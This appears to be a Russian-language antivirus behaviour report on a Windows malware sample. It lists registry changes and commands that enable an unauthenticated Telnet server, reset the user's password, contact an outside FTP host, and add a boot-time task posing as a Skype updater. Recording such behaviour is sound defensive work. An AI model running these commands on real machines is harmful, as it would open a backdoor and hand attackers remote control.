Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\tlntadmn.exe config port=23
- <SYSTEM32>\tlntadmn.exe config mode=stream
- <SYSTEM32>\tlntadmn.exe config sec=-NTLM
- <SYSTEM32>\ftp.exe -n -s:ftp.in store5.data.bg
- <SYSTEM32>\taskkill.exe //im skype.exe
- <SYSTEM32>\net1.exe user %USERNAME% 1
- <SYSTEM32>\sc.exe config TlntSvr start= auto
- <SYSTEM32>\schtasks.exe //create //tn SkypeUpdater //tr %WINDIR%\\system32\\clientskype.exe //sc onstart //sd 01//11//2009 //ru System
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\batchfile.bat" "
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\tlntadmn.exe start
- %APPDATA%\ftp.in
- %TEMP%\1.tmp\batchfile.bat
- 'localhost':1037
- 'st###5.data.bg':21
- DNS ASK st###5.data.bg